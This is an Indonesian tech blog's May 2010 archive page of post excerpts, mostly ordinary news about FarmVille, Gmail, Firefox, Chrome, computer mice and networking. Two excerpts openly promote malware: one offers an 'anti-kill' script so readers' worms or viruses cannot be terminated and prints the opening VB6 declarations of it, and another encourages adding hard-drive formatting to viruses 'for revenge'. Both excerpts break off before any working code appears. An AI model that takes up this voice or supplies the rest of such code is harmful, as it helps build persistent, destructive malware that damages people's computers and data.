Monthly Archives: May 2010

FarmVille dan Mavia Wars Pindah ke Yahoo

foto berita artikel

Sebuah keputusan terbaru untuk mempertahankan judul game populer Zynga seperti “FarmVille”, “Mafia Wars” dan lainnya pada situs jejaring sosial raksasa Facebook untuk sedikitnya lima tahun ke depan. Facebook telah berhasil meroketkan game buatan Zynga berkat memadukan gameplay menarik dengan unsur multiplayer sehingga jutaan user dapat saling terhubung. Perusahaan pengembang game yang sedang naik daun ini telah menandatangani paket kerjasama dengan raksasa internet Yahoo untuk membawa permainan sosialnya kepada basis raksasa mereka, dengan demikian pengguna Yahoo akan memiliki akses akan game Zynga langsung dari homepage Yahoo, Yahoo Mail, Yahoo Messenger dan Yahoo Games, diantara properti lainnya. Read the rest of this entry

Fitur Asik Di Gmail

foto berita artikel Tim Gmail Google telah aktif melakukan baik perbaikan kecil dan besar ke layanan email berbasis web. Untuk klasifikasi yang lebih baik dari email, Gmail Labs telah memperkenalkan fitur baru – Move Icon Columns. Jadi sekarang Anda memiliki pilihan untuk melihat icon yang menggambarkan attachment, Chat, invitatiom Google Calendar, Buzz pos, dll.

Jika Anda harus berburu untuk email dengan attachment ang dikirim oleh teman Anda, detail yang akan diketahui Anda Read the rest of this entry

VLoud Solusi Suara MP3

Hm, ada yang punya masalah sama file mp3? misal suaranya kecil gitu? Pengen pake tool buat louder suaranya ga ngerti..? Jangan sedih, sekarang udah ada situs penyedia layanan buat bikin suara mp3 jadi lebih keras danpaling keras..!

Caranya gampang tinggal klik vloud.com Read the rest of this entry

Bikin VB Portable Sendiri

Hm, ada yang pengen buat VB Portable sendiri? nih saya kasih tau caranya, hehe. Abis browsing – browsing di mbah google , eh dapet artikel ini, yaudah saya post aja di sini. Okelah ga pake basa – basi langsung aja kita ke TKP (hehe)
Yang dimaksud dengan aplikasi portable berarti tuw aplikasi bisa digunakan tanpa proses intall yang biasa kita gunakan, jd tuw file dapat dibawa kemana-mana dengan menggunakan flashdisk dan ukurannya yang lebih kecil menjadi lebih efektif. VB yang akan dibikin portable ini tidak menyertakan seluruh file system atau file-file komponennya, sehingga bisa menjadi lebih kecil. VB yang dibikin ini hanya cukup untuk membuka program VB dan mengedit source code, serta membuat file .exe . . . Okee sekian penjelasan tentang ne program portable yang akan dibuat, sekarang ikuti langkah-langkah berikut untuk membuat “VB portbale”
Read the rest of this entry

Bikin Malware Anti Kill

Hm, masih pengen coding? masih pengen bikin worm? ato virus? mao bikin virus ato worm yang ga bisa di kill proccess nya? oke nih saya kasih script anti kill

Option Explicit

Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4

Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type Read the rest of this entry

Memformat Harddisk Menggunakan VB 6.0

Mau kejam buat virus ? percuma kalo gak ditambahi fungsi format drive, walpun ini menyalahi aturan, tapi kalo buat bales dendam sekali – kali ga apa apa lah. Hehehe

Berikut adalah caranya

Buatlah projek Vb dengan 1 Form dan 1 CommandButton dan 1 Dr

Coding dalam form Read the rest of this entry

Telepon Murah Dengan ‘Google Voice’ Cuma Pakai Alamat E-Mail

Layanan suara Google Voice kini bisa dinikmati para siswa sekolah. Bagi siswa yang memiliki alamat email .edu, yang sign up ke Google Voice, dijanjikan akan mendapat invitation dalam waktu 24 jam. Google Voice menyediakan satu nomor ponsel yang dapat digunakan untuk routing panggilan masuk ke semua ponsel user, pesan SMS gratis, dan berbagai manajemen panggilan dan fitur conference.

Google Voice juga dapat digunakan tanpa nomor telepon sebagai layanan voicemail online, dengan transkripsi speech-to-text, kartu ucapan yang bisa dimodifikasi sendiri, biaya panggilan internasional yang cukup murah, pilihan notifikasi dan kemampuan sharing Read the rest of this entry

Firefox 4.0 comes Faster

foto berita artikel Director Firefox, Mike Beltzner mengatakan bahwa telah terjadi perubahan rencana terhadap Firefox  3.7 yang akan dirilis, karena versi tersebut telah diubah menjadi Firefox 4.0. Dimana Firefox 4.0 dibuat untuk lebih bersaing dengan Microsoft Internet Explorer dan Google Chrome. Terkadang  produsen software tidak akan mengatakan kepada publik sampai software tersebut selesai pembuatannya, tetapi Mozzila sedikit berbeda. Beltzner menulis pada blognya, bahwa Mozzila bekerja dengan terbuka, mensosialisasikan rencana mereka terlebih dahulu sehingga mereka bisa mendapatkan feedback dan membuat seluruh dunia menunggu kehadiran teknologi baru dari Mozzila . Read the rest of this entry

Hacker Indonesia Menyerang 300 ribu Lebih Web Server

Sejak hari minggu (2 mei 2010) kemaren hacker indonesia menyerang 300 ribu lebih web server dengan dDos(Penolakan Layanan secara Terdistribusi). Main IP yg ditemukan berasal dari PT TELKOM yaitu 125.160.245.150 // 125.163.179.26. … ini tuduhan dari media barat…

Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (DDos)) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host Read the rest of this entry

Bentuk – Bentuk Mouse Keren di Dunia

Manusia emang gak ada habisnya buat menciptakan sesuatu yang keren sob, salah satunya adalah mouse komputer, ternyata di dunia ini ada 10 mouse komputer paling keren yang pernah di buat. Pas gw liat tenyata emang bener-bener keren sob dan kayaknya perlu sobat tau buat nambah pengetahuan hehehe~~ nah biar sobat bisa kenali mouse komputer paling keren di dunia silahkan lanjut bacanya juragan!

1. Mouse Mobil
Perhatian bagi para sobat pecinta mobil, sekarang sobat dapat “surfing” di web dengan lisensi resmi replika mobil favorit Anda dengan Road Wireless Mice ($ 44,95). Mouse ini memiliki resolusi 800 dpi untuk meningkatkan keakuratan dan ketepatan, fungsi lampu (dengan on / off switch untuk menghemat baterai), dan bahkan nomor seri VIN individu sehingga sobat bisa mendapatkan personalisasi pendaftaran dan gelar, seperti mobil sungguhan.

mouse mobil
Read the rest of this entry

Chrome Tercepat

crome Pihak Google telah menunjukan bahwa browser andalannya, Chrome beta adalah browser tercepat saat ini.  Software ini menaikan kecepatan browsing setidaknya sebesar 30 persen. Google telah melakukan benchmark V8 dan SunSpider untuk menguji kecepatan Chrome dan mengklaim bahwa ia telah berhasil meningkatkan 30% dan 35 % kecepatan tambahan. Hasil mengesankan ini membuktikan sejak rilis pertama dari Chrome, kecepatan browser telah meningkat sebanyak 305%. Read the rest of this entry

Wired VS Wireless

foto berita artikel

Wireless merupakan teknologi yang menghubungkan dua piranti untuk bertukar data atau suara tanpa menggunakan media kabel. Kelebihan teknologi ini adalah mengeliminasi penggunaan kabel, yang bisa cukup mengganggu secara estetika, dan juga kerumitan instalasi untuk menghubungkan lebih dari 2 piranti bersamaan. Jaringan wireless biasanya populer untuk pembangunan jaringan rumah, namun wireless bukan satu-satunya cara, baik wireless ataupun wired home memiliki keuntungan dan kerugian masing-masing. Ada 3 standar awal jaringan wireless, yakni 802.11b yang digunakan dalam WLAN, 802.11a, lebih cepat dan mahal dari 802.11b dan biasanya dimiliki oleh jaringan bisnis, dan 802.11g yang menjadi gabungan 802.11b dan 802.11a, juga standard paling baru 802.11n.

Sedangkan wired mempergunakan Ethernet kabel dan network adapter. Pada jaringan ini, untuk menghubungkan satu komputer dengan komputer lain diperlukan penghubung berupa kabel jaringan, juga hub, switch atau router sebagai device sentral untuk menangani banyaknya komputer. Kabel jaringan berfungsi dalam mengirim informasi dalam bentuk sinyal listrik antar komputer jaringan.

Berikut perbedaan wired dan wireless : Read the rest of this entry

Google Temukan Banyak “Fake Antivirus”

Software antivirus palsu kini sedang menjamur di Internet, dimana pembuatnya menggunakan metode yang pintar untuk membodohi user agar mau meng-instal program tersebut, menurut report dari Google. Google membuat study yang dilakukan dalam waktu 13 bulan dengan melihat 240 juta halaman web. Google mmperkirakan 11,000 dari domain web tersebut telah mendistribusikan program antivirus palsu, dan 15 persen di antaranya memiliki software berbahaya di web. Read the rest of this entry

Kamuflase Folder Menggunakan “rev_folder_kamuflase 1.2″

Ada yang mau tau cara kamuflase folder?

Nah saya akan kasih tau caranya, tapi sebelumnya kita harus tau dulu seperti apa kamuflase folder tersebut.

Kamuflase folder, mengkamuflase folder menjadi folder – folder system, contoh; Control Panel, Recycle Bin, My Computer, dan My Dcuments. Read the rest of this entry

Adobe Photoshop CS5

Di awal tahun 2010 bulan april tanggal 12 telah keluar product baru dari perusahaan adobe yang di namakan adobe cs5,adobe cs5 ini adalah generasi terbaru dari adobe cs4 yang sebelumnya telah di liris di periode sebelumnya dan telah menjadi favorit bagi kalangan pencinta seni atau grapic design,adobe cs5 ini memiliki banyak sekali ke unggulan dari adobe cs4 yang telah menjadi program paling bagus di tahun lalu. Read the rest of this entry